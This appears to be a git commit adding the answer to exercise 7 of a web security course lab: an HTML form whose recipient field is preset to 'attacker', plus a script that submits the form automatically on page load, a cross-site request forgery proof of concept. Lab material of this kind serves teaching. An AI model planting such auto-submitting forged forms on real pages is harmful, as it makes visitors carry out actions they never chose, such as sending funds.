feat: added exercise 7

--- a/lab3_web_security/answer-7.html
+++ b/lab3_web_security/answer-7.html
@@ -3,3 +3,10 @@
     <p>to <input name=recipient type=text value="attacker" size=10></p>
     <input type="submit" name="submission" value="Send">
 </form>
+
+<script>
+    window.onload = function(){
+        document.forms[0].submit()
+    }
+
+</script>
